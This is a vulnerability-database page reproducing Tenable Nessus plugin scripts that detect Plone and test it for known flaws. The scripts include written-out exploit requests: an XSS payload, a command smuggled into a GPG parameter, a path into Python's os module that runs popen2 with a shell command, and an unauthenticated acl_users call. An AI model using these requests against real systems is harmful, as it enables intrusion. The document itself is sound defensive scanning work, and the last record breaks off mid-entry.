ID PLONE_DETECT.NASL Type nessus Reporter This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-01-02T00:00:00
Description
The remote host is running Plone, a free content management system
written in Python.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(53545);
script_version("1.7");
script_cvs_date("Date: 2019/11/22");
script_name(english:"Plone Detection");
script_summary(english:"Checks for presence of Plone.");
script_set_attribute(
attribute:"synopsis",
value:
"The remote web server contains a content management system written in
Python."
);
script_set_attribute(
attribute:"description",
value:
"The remote host is running Plone, a free content management system
written in Python."
);
script_set_attribute(attribute:"see_also", value:"https://plone.org/");
script_set_attribute(attribute:"solution", value:"n/a");
script_set_attribute(attribute:"risk_factor", value:"None");
script_set_attribute(attribute:"plugin_publication_date", value:"2011/04/25");
script_set_attribute(attribute:"cpe", value:"cpe:/a:plone:plone");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"asset_inventory", value:"True");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("http_version.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
# By default, Zope serves on port 8080. However, most web servers are
# set up to proxy requests for certain directories to Zope, so we can
# just check port 80 and expect to catch most of them.
port = get_http_port(default:80);
# Put together a list of directories to search through.
if (thorough_tests)
dirs = list_uniq(make_list("/plone", "/Plone", "/blog", "/cms", cgi_dirs()));
else
dirs = make_list(cgi_dirs());
# Search for Plone.
installs = NULL;
foreach dir (dirs)
{
# Try to access page.
res = http_send_recv3(
method : "GET",
item : dir + "/",
port : port,
exit_on_fail : TRUE
);
# Check the generator tag.
if ('<meta name="generator" content="Plone - http://plone.org" />' >!< res[2])
continue;
# Parse path from URL.
matches = eregmatch(string:res[2], pattern:'<a href="(?:https?://)?[^/]*(.*)/login(_form)?"');
if (isnull(matches)) continue;
# Ensure the canonical URL matches the directory we're currently
# checking.
if (dir != matches[1]) continue;
# There is no good way to detect the version of Plone that is
# running based on the web page itself.
version = UNKNOWN_VER;
installs = add_install(
appname : "plone",
installs : installs,
port : port,
dir : dir,
ver : version,
cpe : "cpe:/a:plone:plone"
);
# Scan for multiple installations only if the "Perform thorough tests" setting is checked.
if (!thorough_tests) break;
}
if (isnull(installs)) exit(0, "Plone was not detected on the remote host.");
# Report findings.
if (report_verbosity > 0)
{
report = get_install_report(
port : port,
installs : installs,
display_name : "Plone"
);
security_note(port:port, extra:report);
}
else security_note(port);
{"id": "PLONE_DETECT.NASL", "bulletinFamily": "scanner", "title": "Plone Detection", "description": "The remote host is running Plone, a free content management system\nwritten in Python.", "published": "2011-04-25T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/nessus/53545", "reporter": "This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://plone.org/"], "cvelist": [], "type": "nessus", "lastseen": "2021-01-01T04:55:03", "edition": 22, "viewCount": 15, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["PLONE_20130618.NASL", "PLONE_MEMBERSHIPTOOL_ACCESS_CONTROL_BYPASS.NASL", "PLONE_PLONEFORMGEN_CODE_EXECUTION.NASL", "PLONE_20110928.NASL", "PLONE_AUTHENTICATION_BYPASS.NASL"]}], "modified": "2021-01-01T04:55:03", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-01-01T04:55:03", "rev": 2}, "vulnersScore": -0.3}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53545);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_name(english:\"Plone Detection\");\n script_summary(english:\"Checks for presence of Plone.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a content management system written in\nPython.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is running Plone, a free content management system\nwritten in Python.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://plone.org/\");\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/25\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:plone:plone\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"asset_inventory\", value:\"True\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n# By default, Zope serves on port 8080. However, most web servers are\n# set up to proxy requests for certain directories to Zope, so we can\n# just check port 80 and expect to catch most of them.\nport = get_http_port(default:80);\n\n# Put together a list of directories to search through.\nif (thorough_tests)\n dirs = list_uniq(make_list(\"/plone\", \"/Plone\", \"/blog\", \"/cms\", cgi_dirs()));\nelse\n dirs = make_list(cgi_dirs());\n\n# Search for Plone.\ninstalls = NULL;\nforeach dir (dirs)\n{\n # Try to access page.\n res = http_send_recv3(\n method : \"GET\",\n item : dir + \"/\",\n port : port,\n exit_on_fail : TRUE\n );\n\n # Check the generator tag.\n if ('<meta name=\"generator\" content=\"Plone - http://plone.org\" />' >!< res[2])\n continue;\n\n # Parse path from URL.\n matches = eregmatch(string:res[2], pattern:'<a href=\"(?:https?://)?[^/]*(.*)/login(_form)?\"');\n if (isnull(matches)) continue;\n\n # Ensure the canonical URL matches the directory we're currently\n # checking.\n if (dir != matches[1]) continue;\n\n # There is no good way to detect the version of Plone that is\n # running based on the web page itself.\n version = UNKNOWN_VER;\n\n installs = add_install(\n appname : \"plone\",\n installs : installs,\n port : port,\n dir : dir,\n ver : version,\n cpe : \"cpe:/a:plone:plone\"\n );\n\n # Scan for multiple installations only if the \"Perform thorough tests\" setting is checked.\n if (!thorough_tests) break;\n}\n\nif (isnull(installs)) exit(0, \"Plone was not detected on the remote host.\");\n\n# Report findings.\nif (report_verbosity > 0)\n{\n report = get_install_report(\n port : port,\n installs : installs,\n display_name : \"Plone\"\n );\n security_note(port:port, extra:report);\n}\nelse security_note(port);\n", "naslFamily": "CGI abuses", "pluginID": "53545", "cpe": ["cpe:/a:plone:plone"], "scheme": null}
{"nessus": [{"lastseen": "2021-01-01T04:55:03", "description": "The version of Plone installed on the remote web server is affected \nby a cross-site scripting vulnerability because it fails to properly\nsanitize input to the 'mailaddress' parameter of the 'spamProtect.py'\nscript. An attacker may be able to leverage this to inject arbitrary\nHTML and script code into a user's browser to be executed within the\nsecurity context of the affected site. \n\nNote that the application is also reportedly affected by several \nadditional vulnerabilities. Some of the reported vulnerabilities\ninclude but are not limited to arbitrary code execution, privilege \nescalation, denial of service (DoS), open redirect, cross-site \nscripting, as well as several additional flaws; however, Nessus has \nnot tested for the additional issues.", "edition": 25, "published": "2013-07-08T00:00:00", "title": "Plone spamProtect mailaddress Parameter XSS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4190"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:plone:plone"], "id": "PLONE_20130618.NASL", "href": "https://www.tenable.com/plugins/nessus/67205", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67205);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/15 20:50:20\");\n \n script_cve_id(\"CVE-2013-4190\");\n script_bugtraq_id(60339, 61953);\n\n script_name(english:\"Plone spamProtect mailaddress Parameter XSS\");\n script_summary(english:\"Attempts a non-persistent XSS\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a Python script that is affected by a\ncross-site scripting vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Plone installed on the remote web server is affected \nby a cross-site scripting vulnerability because it fails to properly\nsanitize input to the 'mailaddress' parameter of the 'spamProtect.py'\nscript. An attacker may be able to leverage this to inject arbitrary\nHTML and script code into a user's browser to be executed within the\nsecurity context of the affected site. \n\nNote that the application is also reportedly affected by several \nadditional vulnerabilities. Some of the reported vulnerabilities\ninclude but are not limited to arbitrary code execution, privilege \nescalation, denial of service (DoS), open redirect, cross-site \nscripting, as well as several additional flaws; however, Nessus has \nnot tested for the additional issues.\"\n );\n # https://plone.org/products/plone/security/advisories/20130618-announcement\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?05118bde\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/oss-sec/2013/q3/258\");\n script_set_attribute(attribute:\"see_also\", value:\"http://plone.org/products/plone-hotfix/releases/20130618\");\n script_set_attribute(attribute:\"solution\", value:\n\"Follow the instructions in the advisory to apply the hotfix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:plone:plone\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"plone_detect.nasl\");\n script_require_keys(\"www/plone\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname : \"plone\",\n port : port,\n exit_on_fail : TRUE\n);\n\ndir = install[\"dir\"];\nxss_test = \"><script>alert('\" + (SCRIPT_NAME - \".nasl\") + \"-\" + unixtime() +\n \"')</script>\";\n\nexploit = test_cgi_xss(\n port : port,\n dirs : make_list(dir),\n cgi : '/spamProtect',\n qs : 'mailaddress=' + urlencode(str:xss_test),\n pass_str : 'mailto:' + xss_test,\n pass_re : \"<a href=\"\n);\n\nif (!exploit)\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Plone\", build_url(qs:dir, port:port));\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-01T04:55:03", "description": "The version of PloneFormGen, an add-on for Plone, installed on the\nremote web server contains a flaw that allows arbitrary code execution. \nUsing a specially crafted URL, this can allow an unauthenticated, remote\nattacker the ability to run arbitrary commands on the system subject to\nthe privileges of the web server user.", "edition": 25, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2013-06-11T00:00:00", "title": "Plone PloneFormGen Unspecified Arbitrary Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": [], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:plone:plone"], "id": "PLONE_PLONEFORMGEN_CODE_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/66862", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66862);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_bugtraq_id(60247);\n\n script_name(english:\"Plone PloneFormGen Unspecified Arbitrary Code Execution\");\n script_summary(english:\"Tries to execute arbitrary code\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a Python script that is affected by a\nremote code execution vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of PloneFormGen, an add-on for Plone, installed on the\nremote web server contains a flaw that allows arbitrary code execution. \nUsing a specially crafted URL, this can allow an unauthenticated, remote\nattacker the ability to run arbitrary commands on the system subject to\nthe privileges of the web server user.\"\n );\n # http://plone.org/products/plone/security/advisories/ploneformgen-vulnerability-requires-immediate-upgrade\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3e7f0ef9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://pypi.org/project/Products.PloneFormGen/1.7.11/\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 1.7.11 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:plone:plone\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"plone_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/plone\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname : \"plone\",\n port : port,\n exit_on_fail:TRUE\n);\n\ndir = install[\"dir\"];\ninstall_url = build_url(qs:dir, port:port);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig%20/all';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig%20/all');\n\ncmd_pats = make_array();\ncmd_pats['id'] = \"uid=[0-9]+.*gid=[0-9]+.*\";\ncmd_pats['ipconfig%20/all'] = \"Subnet Mask\";\n\nforeach cmd (cmds)\n{\n url = '@@gpg_services/encrypt?data=&recipient_key_id=%26' + cmd;\n\n res = http_send_recv3(\n method : \"GET\",\n item : dir + \"/\" + url,\n port : port,\n exit_on_fail : TRUE\n );\n\n if (egrep(pattern:cmd_pats[cmd], string:res[2]))\n {\n if (report_verbosity > 0)\n {\n snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n report =\n '\\nNessus was able to verify the issue exists using the following request :' +\n '\\n' +\n '\\n' + install_url + '/' + url +\n '\\n' +\n '\\n';\n if (report_verbosity > 1)\n {\n report +=\n '\\nNessus executed the command : \"'+cmd+'\" which produced the' +\n '\\nfollowing output :' +\n '\\n' +\n '\\n' + snip +\n '\\n' + data_protection::sanitize_uid(output:chomp(res[2])) +\n '\\n' + snip +\n '\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n}\naudit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, \"Plone\", install_url, \"PloneFormGen add-on\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:55:03", "description": "The version of Plone hosted on the remote web server has a flaw that\nallows arbitrary access to Python modules. Using a specially crafted\nURL, this can allow an unauthenticated, remote attacker the ability to\nrun arbitrary commands on the system through the Python 'os' module in\nthe context of the 'Zope/Plone' service.", "edition": 26, "published": "2011-12-20T00:00:00", "title": "Plone Request Parsing Remote Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3587"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:plone:plone"], "id": "PLONE_20110928.NASL", "href": "https://www.tenable.com/plugins/nessus/57350", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57350);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2011-3587\");\n script_bugtraq_id(49857);\n\n script_name(english:\"Plone Request Parsing Remote Command Execution\");\n script_summary(english:\"Tries to execute a command.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A web application on the remote host allows arbitrary remote code\nexecution.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Plone hosted on the remote web server has a flaw that\nallows arbitrary access to Python modules. Using a specially crafted\nURL, this can allow an unauthenticated, remote attacker the ability to\nrun arbitrary commands on the system through the Python 'os' module in\nthe context of the 'Zope/Plone' service.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://plone.org/products/plone/security/advisories/20110928\");\n script_set_attribute(attribute:\"see_also\", value:\"http://plone.org/products/plone-hotfix/releases/20110928\");\n # http://zope2.zope.org/news/security-vulnerability-announcement-cve-2011-3587\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b32a0de5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://pypi.org/project/Products.PloneHotfix20110928/1.0/\");\n script_set_attribute(attribute:\"solution\", value:\"Follow the instructions in the advisory to apply the hotfix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Plone RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Plone and Zope XMLTools Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:plone:plone\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"plone_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/plone\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\n# Get details of Plone install.\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(appname:\"plone\", port:port, exit_on_fail:TRUE);\ndir = install[\"dir\"];\n\n# Verify the vuln exists (regardless of whether we can exploit it)\nos_module = \"p_/webdav/xmltools/minidom/xml/sax/saxutils/os\";\nurl = dir + \"/\" + os_module;\n\nres = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n exit_on_fail : TRUE\n);\n\nif (\"<module 'os' from '\" >!< res[2])\n exit(0, \"The Plone installation at \" + build_url(port:port, qs:dir) + \" is not affected.\");\n\n# it looks like only Unix Systems have popen2 compiled in,\n# so this shouldn't work on Windows - but we can try anyways\nfile_name = SCRIPT_NAME + \"-\" + unixtime();\nunix_command = urlencode(str:\"touch /tmp/\"+ file_name);\nwindows_command = urlencode(str:\"echo \" + SCRIPT_NAME + \" > %windir%/temp/\"+file_name);\n\nverify_instructions =\n'An attempt was made to create a temporary file on the remote host.\\n'+\n'You can verify its existence by checking for it at the following\\n'+\n'path';\n\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os)\n {\n commands = make_list(unix_command, windows_command);\n verify_instructions += 's:\\n\\n';\n verify_instructions += ' C:\\\\Windows\\\\temp\\\\' + file_name + '\\n';\n verify_instructions += ' C:\\\\Winnt\\\\temp\\\\' + file_name + '\\n';\n }\n else\n {\n commands = make_list(unix_command);\n verify_instructions += ':\\n\\n';\n verify_instructions += ' /tmp/' + file_name + '\\n';\n }\n}\nelse {\n commands = make_list(unix_command, windows_command);\n verify_instructions += 's (dependent on host operating system):\\n\\n';\n verify_instructions += ' /tmp/' + file_name + '\\n';\n verify_instructions += ' C:\\\\Windows\\\\temp\\\\' + file_name + '\\n';\n verify_instructions += ' C:\\\\Winnt\\\\temp\\\\' + file_name + '\\n';\n}\n\ncommand_success = FALSE;\nurl_list = make_list();\n\nforeach command (commands)\n{\n url = dir + \"/\" + os_module + \"/popen2?cmd=\" + command;\n url_list = make_list(url_list, url);\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n exit_on_fail : TRUE\n );\n\n if (\"<open file '<fdopen>'\" >< res[2]) command_success = TRUE;\n}\n\nif (report_verbosity > 0)\n{\n if (command_success)\n {\n report = '\\nNessus was allowed to execute commands on the remote host.\\n' +\n 'The following requests were made:\\n\\n';\n foreach url (url_list)\n report += ' ' + build_url(qs:url, port:port) + '\\n';\n report += '\\n' + verify_instructions;\n }\n else\n {\n report = '\\nNessus was able to determine that the vulnerability exists on the\\n' +\n 'remote host, but was not able to successfully exploit it.\\n';\n }\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:55:03", "description": "The version of Plone on the remote host fails to require\nauthentication to access several sensitive functions.\n\nPlone is built on top of Zope, which maps Python objects and their\nmethods to URLs. Methods can have security restrictions, such as\nrequiring a login account or a specific privilege level, applied to\nthem to limit access. The installed version of Plone permits access\nto several methods that allow the adding, deleting, and changing\ncontent and users.", "edition": 25, "published": "2011-04-25T00:00:00", "title": "Plone Security Bypass", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0720"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:plone:plone"], "id": "PLONE_AUTHENTICATION_BYPASS.NASL", "href": "https://www.tenable.com/plugins/nessus/53546", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53546);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2011-0720\");\n script_bugtraq_id(46102);\n script_xref(name:\"Secunia\", value:\"43146\");\n\n script_name(english:\"Plone Security Bypass\");\n script_summary(english:\"Tries to access privileged object methods\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server has an application that that is affected by a\nsecurity bypass vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Plone on the remote host fails to require\nauthentication to access several sensitive functions.\n\nPlone is built on top of Zope, which maps Python objects and their\nmethods to URLs. Methods can have security restrictions, such as\nrequiring a login account or a specific privilege level, applied to\nthem to limit access. The installed version of Plone permits access\nto several methods that allow the adding, deleting, and changing\ncontent and users.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://plone.org/products/plone/security/advisories/cve-2011-0720\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/fulldisclosure/2011/Apr/293\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply Plone Hotfix CVE-2011-0720.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/25\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:plone:plone\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"plone_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/plone\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"webapp_func.inc\");\n\n# Get details of Plone install.\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:\"plone\", port:port, exit_on_fail:TRUE);\ndir = install[\"dir\"];\n\n# Try to access a method that should be restricted to privileged, authenticated,\n# users.\nobject = \"acl_users\";\nmethod = \"getUsers\";\nurl = dir + \"/\" + object + \"/\" + method;\nres = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n exit_on_fail : TRUE\n);\n\n# If it's not a Python list, then we can assume it didn't work.\nif (!ereg(string:res[2], pattern:\"^\\[.*\\]$\"))\n exit(0, \"The Plone installation at \" + build_url(port:port, qs:dir) + \" is not affected.\");\n\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus was able to exploit the issue using the following request :' +\n '\\n' +\n '\\n ' + build_url(port:port, qs:url) +\n '\\n';\n\n if (report_verbosity > 1)\n report +=\n '\\nIt produced the following response :' +\n '\\n' +\n '\\n ' + res[2];\n\n security_hole(port:port, extra:report + '\\n');\n}\nelse security_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:55:03", "description": "The remote host is running Plone, an open source content manage system\nwritten in Python.\n\nThe version of Plone installed on the remote host does not limit\naccess to the 'changeMemberPortrait' and 'deletePersonalPortrait'\nMembershipTool methods. An unauthenticated attacker can leverage this\nissue to delete member portraits or add / update portraits with\nmalicious content.", "edition": 24, "published": "2006-04-14T00:00:00", "title": "Plone Unprotected MembershipTool Methods Arbitrary Portrait Manipulation", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1711"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:plone:plone"], "id": "PLONE_MEMBERSHIPTOOL_ACCESS_CONTROL_BYPASS.NASL", "href": "https://www.tenable.com/plugins/nessus/21219", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21219);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n\n script_cve_id(\"CVE-2006-1711\");\n script_bugtraq_id(17484);\n\n script_name(english:\"Plone Unprotected MembershipTool Methods Arbitrary Portrait Manipulation\");\n script_summary(english:\"Tries to change profiles using Plone\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Python application that is affected\nby an access control failure.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Plone, an open source content manage system\nwritten in Python.\n\nThe version of Plone installed on the remote host does not limit\naccess to the 'changeMemberPortrait' and 'deletePersonalPortrait'\nMembershipTool methods. An unauthenticated attacker can leverage this\nissue to delete member portraits or add / update portraits with\nmalicious content.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://dev.plone.org/plone/ticket/5432\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either install Hotfix 2006-04-10 1.0 or upgrade to Plone version 2.0.6\n/ 2.1.3 / 2.5-beta2 when they become available.\" );\n 